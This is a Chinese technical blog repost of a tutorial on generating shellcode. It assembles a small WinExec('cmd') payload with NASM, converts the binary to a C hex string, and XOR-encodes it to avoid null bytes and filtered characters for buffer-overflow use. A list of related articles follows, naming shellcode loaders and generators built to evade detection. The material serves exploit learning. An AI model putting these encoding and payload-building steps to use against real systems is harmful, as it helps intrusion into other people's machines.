ShellCode生成器

最新推荐文章于 2024-05-15 10:08:08 发布
最新推荐文章于 2024-05-15 10:08:08 发布
阅读量6.1k 收藏 6
点赞数
分类专栏: 其它 文章标签: 汇编 byte file cmd fp buffer

http://hi.baidu.com/olhack/blog/item/4eaad7b4132c15738ad4b2f6.html

 

黑防以前N多的文章已经介绍了ShellCode的编写,所以关于ShellCode的编写不是本文的目的。一般情况下,我们都是用汇编写好实现ShellCode功能的汇编代码,然后再提取16进制,那怎么提取呢?有人说用VC反汇编后,可以得到对应的16进制代码,然后手抄! Oh……晕死!有人说用内存拷贝!Oh……也比较笨,而且还要自己做一些麻烦的处理。呵呵,说了这么多废话,就是引出本文的写作目的:给大家介绍如何通过编程来实现提取ShellCode的16进制代码,并且能提供对ShellCode进行XOR加密而避开特殊字符的限制。
这里首先要感谢delicon(国外的一个牛人),因为我这里的编程实现有部分借鉴他提供的源代码。其实在安全焦点,navyseals已经提供了ShellCode提取的小工具。如果大家只是要用工具,那么可以直接去下载来用就是,或者用我在附件里提供的工具也可。不过有人说过,不会自己写工具的人不是一个真正的黑客。呵呵,你想成为真正的黑客吗? Ok……Do it yourself!
如果是实现小型功能的ShellCode,我们大可以用VC的内联汇编功能,但如果是要实现功能复杂一点的ShellCode,VC的内联汇编就远远不能满足我们的要求了,而且内联汇编不易移植,这时候我们就要换一个更为强大的汇编编译器NASM(附件里有收录),我们可以先写用汇编写好代码。比如我们写一段开DOS窗口的汇编代码,如下:
push ebp
mov ebp,esp
push ebx
mov byte ptr [ebp-4],63h // ‘c’
mov byte ptr [ebp-3],6Dh // ‘m’
mov byte ptr [ebp-2],64h // ‘d’
mov byte ptr [ebp-1],0 // ‘/0’

push 5 //这里,#define SW_SHOW 5
lea eax,[ebp-4]
push eax
mov eax, 0x77e4fd35 
call eax
pop esp
小提示:上面0x77e4fd35是WinExec函数在作者计算机(Windows XP SP1)上的函数入口地址,不同的系统该地址可能不同。

 

这段汇编代码实现的功能对应的C语言如下:
#include <windows.h>
void main()
{
char cmdline[4] = “cmd”;
WinExec(cmdline,SW_SHOW); 
}
如果我们用在VC的内联汇编中,就应该是下面这样的格式:
#include <windows.h>
void main()
{
__asm{
push ebp
mov ebp,esp
push ebx
mov byte ptr [ebp-4],63h
mov byte ptr [ebp-3],6Dh
mov byte ptr [ebp-2],64h
mov byte ptr [ebp-1],0

push 5
lea eax,[ebp-4]
push eax
mov eax, 0x77e4fd35
call eax
pop esp
}
}
看,也就是把内联汇编块用__asm{}包起来。好,我们编译运行,可爱的DOS窗口就弹出来了。 
那么我们怎么运用NASM来编译汇编代码呢?很简单,把实现功能的汇编代码段(比如上面这段开DOS窗口的代码)在代码的第一行,加上BITS 32,如下图2所示。然后把汇编代码段里的类型转换指令PTR全部去掉(因为NASM的BYTE已经做了优化,它本身已经相当于MASM的PTR BYTE了),保存在一个后缀名为.asm的文件里,比如上面的,我保存为cmd.asm,然后在命令行下输入下列命令;
nasm –s –fbin cmd.asm
参数解析: -s 重定向错误消息到标准输出,便于查看错误
-f 后接有效的输出格式,比如可以接-fbin,-fwin32 –fobj等。如果不跟格式,就表示默认为-fbin,生成平坦格式的二进制文件(具体详细的命令参数可以查看NASM帮助。) 
如果没有错误,就会生成一个名为CMD文件,如果用UltraEdit查看。呵呵,你会发现里面就是我们想要的ShellCode十六进制码。有些读者开始用鼠标“框”,然后拷贝。呵呵,大哥悠着点,我们还没完,你不觉得这样跟在VC里用内存拷贝没什么区别吗?而且你还要手动的在每个字节前添加/x或0x。既然16进制码都有了,我们还写不出一个提取ShellCode的小程序吗? 呵呵,废话少说,直接给出提取ShellCode的C代码:

void ShellCodeGenerater(char *file)
{
int iFileSize;
FILE *fp = NULL;

fp = fopen(file,"rb"); //以二进制只读模式打开文件
if( fp == NULL ) // 判断文件是否成功打开
{
printf("Error: Unable to open %s!/n",file);
exit(1);
}
//计算文件大小
fseek(fp,0,SEEK_END); //移到文件末尾
iFileSize = ftell(fp); //获得文件指针的当前位置,iFileSize就是文件的大小了
fseek(fp,0,SEEK_SET); //回到文件头位置

BYTE bb;
char *buff = (char *)malloc(iFileSize); //预留足够的空间
if( fgets(buff,iFileSize,fp) == NULL ) //把读入文件内容读入buff缓冲区
{
printf("Error: Unable to read from file./n");
exit(1);
}

FILE* myfile;
myfile = fopen("ShellCode.txt","w"); //创建或打开ShellCode.txt来保存ShellCode
fprintf(myfile,"char shellcode[] = /n"); 
fprintf(myfile,"/"");
for( int i=0 ; i < iFileSize ; i++ )

bb = buff[i];
fprintf(myfile,"//x%2.2X",bb);
if(i%16==0) // 每行16个字节
{
fprintf(myfile,"/"");
fprintf(myfile,"/n/"");

}
//关闭文件流
fclose(myfile);
fclose(fp);
return;
}
整个程序思路很简单,就是基本的文件读取操作而已,提供一个文件名,按二进制格式读取,然后在每个字节前加上/x,输出到一个文件名为“ShellCode.txt”的文件中,简单吧!比如我们编译上面的程序后生成名为ShellCode_Gen.exe,那么对于前面生成的cmd文件,我们就可以在命令行下:ShellCode_Gen.exe CMD,如果没有错误发生,就得到了ShellCode.txt文件,打开看看。
这样就可以轻松地拷贝了,而且免去了手动添加/x的痛苦。
大家都知道,一般用于缓冲区溢出的ShellCode都对编码有要求,最典型的就是不允许0x00空字符的存在了,因为在传输过程中它会截断我们的ShellCode而导致溢出失败。更特殊的,对于不同的漏洞程序,还有特殊字符的限制,更加迫使我们对ShellCode进行编码。下面,我们通过修改上面的程序来解决这些问题吧。 
最普通的情况是,我们可以选择一个合适的XOR值(比如常见的0x97或0x99),对整个ShellCode里所有字节进行XOR,然后在解码的时候再XOR回来。
对于上面的void ShellCodeGenerater(char *file),我们做一点小改动,给它多加一个参数:
void ShellCodeGenerater(char *file,char *xorchar) 
其中第2个参数是我们在命令行下赋给程序的第2个参数,它就是我们用来XOR的单个字节,比如0x97。
我们的思路和上面是一样的,就是在写入ShellCode.txt前,对每个字节XOR一次,所以需要开辟一块大小和buff一样的空间来存放XOR后的值,然后逐个按位异或,并记录包含“/x00”字节的个数:
for(int i=0; i<iFileSize; i++)
{
//bEncodeChar是利用strtoul(xorchar,NULL,0)转换而来
buff2[i] = buff[i]^bEncodeChar; 
if ( buff2[i] == '/x00')
CountOfNull++; // CountOfNull用来计数‘/x00’的个数
}
到这还没完,我们只是避开了“/x00”空字节,那其它的特殊字符呢?比如RPC溢出利用中对“/”做了限制?来解决这个问题,精益求精嘛。上面的程序只需要改动一点点,先添加一个函数,它检验并计算存在多少个我们所指定不包括“/x00”在内的非法受限字符,该函数定义如下:
int GetNumOfIllegalChar(char *buffer, char* IllegalChar)
{
char *p;
int count =0;
for( ; *IllegalChar; IllegalChar++) 
{
p = strchr(buffer,*IllegalChar); //查找非法字符
if(p) count++; 
}
return count;
}
其中,buffer指向的是buff2所指的缓冲区,IllegalChar所指的字符串为程序命令行的第3个参数,GetNumOfIllegalChar()返回的是不包括“/x00”在内的非法字符数。我们把这个函数放在ShellCodeGenerater()里调用,所以得再给ShellCodeGenerater()添加第3个参数,让他接受程序得第3个命令行参数:
void ShellCodeGenerater(char *file,char *xorchar,char *specialchar)
详细的源代码参照附件encodeshellcode.cpp。
对选取的XOR值只要能避开“/x00”和非法字符即可,比如0x96不行,换0x97,如果还不行,换0x99,直到行为止,只要受限字符不是太多,总会得到适合的XOR值的。最后得到我们的加密ShellCode程序,假如用上面CMD文件做试验,“0x97”做XOR值,受限字符为“/:()|”,那么在命令行下就可以这样使用:
encodeshellcode.exe CMD 0x99 /:()|

看到反白部分,指出有一个不合法字符。那换0x97试试:
Encodeshellcode.exe CMD 0x97 /:()|
得到结果如图6所示:
再打开生成的ShellCode.txt。

哈哈,这就是我们可用的编码过的ShellCode了!

本文介绍的编程实现虽然很简单,而且在编码这里也有存在一定的局限性,但大家可以发挥你们的聪明才智,将其改进完善,相信一定会非常实用的。真诚希望本文能给在正学习缓冲区溢出和ShellCode技术的你一点帮助。

CodeMasterShiller
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2316
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时器回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
推荐开源项目:Shellcode Compiler - 简易且强大的代码转Shellcode工具
最新发布
gitblog_00077的博客
05-15 318
推荐开源项目:Shellcode Compiler - 简易且强大的代码转Shellcode工具 项目地址:https://gitcode.com/NytroRST/ShellcodeCompiler Shellcode Compiler是一个创新的开源程序,它可以将C/C++风格的代码编译成适用于Windows(x86和x64)及Linux(x86和x64)系统的精简、位置无关、NULL字符免的...
编写shellcode(vs2017)
osummertime的博客
04-24 2649
代码大概明白,细节处有待吸收。 注意:关闭GS,关闭DEP,优化/O1 引用//------------------------------------------------------------------------- // Shellcode Template in C // // Compile with VC 6: // C:\CSC> cl.exe -MD -O1 Shellco
chiralium:Windows的Shellcode-to-binary生成器
05-08
手性 描述 只是一个简单的工具,可以使用Golang从shellcode生成二进制文件。 当然,您需要能够“构建”。 您也可以指定自己的shellcode或使用msfvenom即时生成一个抄表器reverse_https(x86或x64)。 为了避免静态shellcode的检测,shellcode使用AES加密存储(每次编译都会生成唯一的随机密钥/ iv),然后存储在go文件中,然后在执行时进行编译和解密。 还创建了metasploit的资源文件,因为我太懒了,无法手动运行它。 我不相信任何东西,只是使用了来自许多地方的东西,例如。 目前,您可以: 仅编译Windows Shellcode 针对x86或x64体系结构进行编译 使用syscall执行您的shellcode 该程序已在Linux(Debian)和python3上进行了测试。 安装 所需组件: 高朗 python3
shellcode_generator:shellcode生成器,Visual Studio,C ++,Windows
03-09
shellcode_generator shellcode生成器,Visual Studio,C ++,Windows
c++之shellcode加载器
qq_44657899的博客
05-26 3431
文章目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
CSSG:钴击Shellcode生成器
03-07
CSSG钴击Shellcode生成器Shellcode-Shellcode Generator添加到Cobalt Strike顶部菜单栏 CSSG是一种侵略者和python脚本,用于更轻松地生成和格式化信标shellcode 使用公开的退出方法,其他格式,加密,编码,压缩,...
asga:用于 ARM 目标的字母数字 Shellcode 生成器
06-18
asga(用于 ARM 目标的字母数字 Shellcode 生成器) 基于 Rix 的“Writing ia32 alphanumeric shellcodes”、来自 BerendJanWever 的“Alpha3”的循环解码思想,以及 Yves Younan 等人的 Phrack 文章“Alphanumeric...
shellcode加载器
10-02
Metasploit Framework则是一个开源的安全工具集,广泛用于漏洞利用和安全研究,其中包括生成和管理shellcode的功能。 综上所述,这个shellcode加载器的组合可能是一个用于渗透测试或研究目的的工具,使用者可以通过...
shellcode加载器用于加密shellcode的py小玩意
10-03
6. **文件I/O操作**:"ShellCode_Loader.py"可能是实现这些功能的主要脚本,而"Shellcode_encryption.exe"可能是一个测试用例或辅助工具,用于生成或加载加密后的shellcode。`requirements.txt`文件则列出了项目所...
shellcode自动生成技术研究
07-20
shellcode基本形式入手,说明shellcode编写方法,从而进行自动化生成
shellex:C-shellcode 到十六进制转换器,在 gdb、windbg、radare2、ollydbg、x64dbg、免疫调试器和 010 编辑器中粘贴和执行 shellcode 的便捷工具
05-31
Shellex 警告:世界上最丑的代码 C-shellcode 到十六进制转换器。 在 gdb、windbg、radare2、ollydbg、x64dbg、immunity debugger 和 010 编辑器中粘贴和执行 shellcode 的便捷工具。 您在将 C-shellcode 转换为 HEX 时遇到问题(可能是 c-comments+ASCII 混合?) 这是shellex。 如果 shellcode 可以在 C 编译器中编译,shellex 可以转换它。 只需执行 shellex,粘贴 shellcode c 字符串,然后按 ENTER。 结束使用 Control+Z(Windows)/Control+D(Linux) 转换c-shellcode-multi-line-hex+mixed_ascii(注意混合部分\x68//sh\x68/bin\x89 ):
如何用Powershell PE注入弹你一脸计算器
xiaoi123的博客
05-10 1585
i春秋超级版主:浅安今天我们将看看以编程的方式把shellcode注入到磁盘上的PE可执行文件中,请注意我们仅仅只是在谈论exe文件,PE文件格式包括许多其他扩展(dll,ocx,sys,cpl,fon,…)。手动执行此操作非常简单,关键点在于需要确保PE的功能没有改变,以免引起怀疑。但手动注入往往不实用,你需要先复制一份PE,在你自己主机上更改它,然后替换目标机器中的该文件。为了简化这个过程,我...
C与javascript格式的shellcode相互转换小工具
giantbranch的专栏
10-25 2309
最近在分析一些ie的漏洞,一般的shellcode都是C语言版的,所以就随手写个小工具 编程语言:C++, 利用MFC框架 整个工程的源码及可执行程序下载(release和debug版都有编译):https://github.com/giantbranch/convert-c-javascript-shellcode 先看看效果 转化代码: c到j
使用C编译器编写shellcode
ooyyee的专栏
08-19 1159
准备工作 为了确保能生成可用作shellcode这样特定格式的代码,我们需要对Visual Studio做些特殊的配置。下面的各项配置,可能随编译器的变更而变更: 1、使用Release模式。近来编译器的Debug模式可能产生逆序的函数,并且会插入许多与位置相关的调用。 2、禁用优化。编译器会默认优化那些没有使用的函数,而那可能正是我们所需要的。 3、禁用栈缓冲区安全检查(
如何编写并编译一个shellcode
dasgk的专栏
09-12 2326
最近开始再看LINUX了嘛(希望还不算太晚)。所以就找找文章,看有什么好的就贴到自己BLOG上来。 【实验环境】         虚拟机:VMware Workstation , Version: 5.5.3 build-34685         虚拟机OS:Redhat Linux 9.03简体中文版,X86-based PC         主机OS:Microsoft Window
shellcode生成器
04-11
b'shellcode生成器'是用于生成恶意代码的软件。它通常被黑客用于攻击受害者的计算机系统,执行各种恶意活动,如窃取敏感信息、控制系统、启动勒索软件等。该生成器可以创建针对不同操作系统和处理器架构的shellcode,通常用于利用计算机系统中的漏洞。因此,b'shellcode生成器'是一种非常危险的工具,应该被严格控制和限制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值